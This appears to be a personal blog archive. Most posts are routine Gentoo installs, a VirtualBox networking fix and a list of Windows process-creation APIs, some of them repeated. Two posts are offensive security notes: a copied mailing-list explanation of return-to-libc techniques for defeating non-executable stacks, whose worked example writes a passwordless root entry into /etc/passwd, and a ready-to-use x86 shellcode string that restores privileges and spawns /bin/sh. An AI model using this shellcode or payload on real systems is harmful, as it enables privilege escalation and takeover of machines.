Thursday, 27 January 2011
Monday, 15 March 2010
Note on non-exec
http://seclists.org/vuln-dev/2000/Apr/252
Hope i can reproduce all of case here :)
1) Certainly the simplest case is when the programme calls system()
itself - just "return" to the call.
2) Call some other legitimate subroutine with rogue parameters. For
instance, call an initialization routine to read a bogus configuration
file.
3) Use some other part of memory that is both writable and executable.
For instance, a user-supplied string might be copied to a malloc()'ed or
static buffer at a predictable address, which might be executable.
4) Use a subroutine within the accessible address range to shift some
values around on the stack so that after two levels of return, the libc
routine is called with user-supplied arguments.
This needs a bit more explanation. Assume that there is a subroutine
that copies a value from, say, BP+8 to BP-0x14, (that'd be a parameter
to a local variable) and doesn't do anything much after that before
returning. Let the address of the subroutine, after the stack
manipulation on entry, be 0x88888888, and let the value of BP be
0xCCCCCCCC when the buffer overflow occurs. Let the address of the
system() function be 0x00102030.
The overflowed buffer could contain the following data at given
addresses (0xDEADBEEF denotes unimportant values):
0xCCCCCC80: the string "echo foo::0:0::/:/bin/sh >>/etc/passwd;"
0xCCCCCCCC: 0xCCCCCCEC - the value for BP for the sub at 0x88888888
0xCCCCCCD0: 0x88888888 - "return" address
0xCCCCCCD4: 0xDEADBEEF - value for BP when system() is called
0xCCCCCCD8: 0xDEADBEEF - will be overwritten by 0x00102030
0xCCCCCCDC: 0xDEADBEEF - address that system() returns to
0xCCCCCCE0: 0xCCCCCC80 - the parameter for system()
0xCCCCCCE4: 0xDEADBEEF
0xCCCCCCE8: 0xDEADBEEF
0xCCCCCCEC: 0xCCCCCCD4 - value for BP in the second end-of-sub
0xCCCCCCF0: 0x88888888 - any end-of-subroutine would do
0xCCCCCCF4: 0x00102030 - possible on a little-endian machine
Now, when the subroutine containing the overflow terminates, the value
of BP (0xCCCCCCCC) is moved to SP. Then BP gets the new value
0xCCCCCCEC from stack, and control returns to 0x88888888. This address
is in the middle of a subroutine, so BP is not pushed onto the stack and
replaced by the value of SP. The subroutine copies the value 0x00102030
from 0xCCCCCCF4 (BP+8) to 0xCCCCCCD8 (BP-0x14), moves BP to SP, pops
0xCCCCCCD4 into BP, and "returns" to 0x88888888. An irrelevant value is
copied from 0xCCCCCCDC (BP+8) to 0xCCCCCCC0 (BP-0x14), BP is moved to
SP, an irrelevant value for BP is popped from the stack (location
0xCCCCCCD4), and the subroutine "returns" to the address 0x00102030,
that is, to the system() library function. The value of SP is now
0xCCCCCCDC. At that address, system() expects to find a return address,
followed by the address of the parameter string. The system() function
passes the string at 0xCCCCCC80 to the shell, then returns to a bogus
address and crashes in this example.
5) Find a "jump to register" opcode somewhere, set up the register
suitably, then "return" to the address of the register jump. For
instance, if the subroutine containing the buffer overflow also parses a
decimal integer and leaves the result in DX before returning, you could
hunt for an opcode for "jump dx", including the value 1056816
(0x00102030) in the input and returning to the jump instruction. The
two-byte opcode (or equivalent) is reasonably likely to exist purely by
chance in most programmes except for quite small ones.
6) Ditto, but with a "syscall" opcode. I don't know how difficult this
type of exploit would be in practice, but it's theoretically quite
possible, at least in combination with (2) above.
Of course, buffer overflows can be exploited in ways that don't affect
the path of execution at all - directing some output to the wrong file
can be effective enough, for example.
Thursday, 3 December 2009
Install conky
#emerge conky
You can find the sample configuration file at
* /etc/conky/conky.conf. To customize it, copy
* /etc/conky/conky.conf to ~/.conkyrc and edit
* it to your liking.
*
* For more info on Conky's new features,
* please look at the README and ChangeLog:
* /usr/share/doc/conky-1.6.1/README.bz2
* /usr/share/doc/conky-1.6.1/ChangeLog.bz2
* There are also pretty html docs available
* on Conky's site or in /usr/share/doc/conky-1.6.1
*
* Also see http://www.gentoo.org/doc/en/conky-howto.xml
*
* Vim syntax highlighting for conkyrc now enabled with
* USE=vim-syntax, for Nano with USE=nano-syntax
*
Thursday, 12 November 2009
Restore privledge and /bin/sh shellcode
My favourite shellcode, basically it will call setreuid(geteuid()) and call /bin/sh.
"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f \x73\x68\x58\x4e\x41\x41\x41"
Wednesday, 11 November 2009
Problem with VirtualBox Winxp Ethernet Adapter
After install windows xp at guest machine on virtual box, i change NIC to Bridge, but i got the error:
Failed to start the virtual machine name.
Failed to open/create the internal network 'HostInterfaceNetworking-eth0' (VERR_SUPDRV_COMPONENT_NOT_FOUND).
Failed to attach the network LUN (VERR_SUPDRV_COMPONENT_NOT_FOUND).
One of the kernel modules was not successfully loaded. Make sure that no kernel modules from an older version of VirtualBox exist. Then try to recompile and reload the kernel modules by executing '/etc/init.d/vboxdrv setup' as root (VERR_SUPDRV_COMPONENT_NOT_FOUND).
Google at first, i see a solution:
#modprobe vboxnetflt
Failed to start the virtual machine name.
Failed to open/create the internal network 'HostInterfaceNetworking-eth0' (VERR_SUPDRV_COMPONENT_NOT_FOUND).
Failed to attach the network LUN (VERR_SUPDRV_COMPONENT_NOT_FOUND).
One of the kernel modules was not successfully loaded. Make sure that no kernel modules from an older version of VirtualBox exist. Then try to recompile and reload the kernel modules by executing '/etc/init.d/vboxdrv setup' as root (VERR_SUPDRV_COMPONENT_NOT_FOUND).
Google at first, i see a solution:
#modprobe vboxnetflt
API call Create New Process
Some API function to call new process:
# 'WinExec()' (kernel32.dll)
# 'ShellExecute()' (Shell32.dll)
# 'ShellExecuteEx()' (shell32.dll)
# 'CreateProcess()' (kernel32.dll)
# 'CreateProcessAsUser()' (AdvAPI32.dll)
# 'CreateProcessWithLogonW()' (AdvAPI32.dll)
# 'WinExec()' (kernel32.dll)
# 'ShellExecute()' (Shell32.dll)
# 'ShellExecuteEx()' (shell32.dll)
# 'CreateProcess()' (kernel32.dll)
# 'CreateProcessAsUser()' (AdvAPI32.dll)
# 'CreateProcessWithLogonW()' (AdvAPI32.dll)
Tuesday, 10 November 2009
Install eclipse
First of all, i search through package to find any useful :)
#emerge --search eclipse
So i found eclipse-sdk
Next i emerge it:
#emerge eclipse-sdk
It said package j2sdk is restricted download, so i have to download manual and put it to
/usr/portage/distfile
After that we can :
#emerge eclipse-sdk
#emerge --search eclipse
So i found eclipse-sdk
Next i emerge it:
#emerge eclipse-sdk
It said package j2sdk is restricted download, so i have to download manual and put it to
/usr/portage/distfile
After that we can :
#emerge eclipse-sdk
Subscribe to:
Posts (Atom)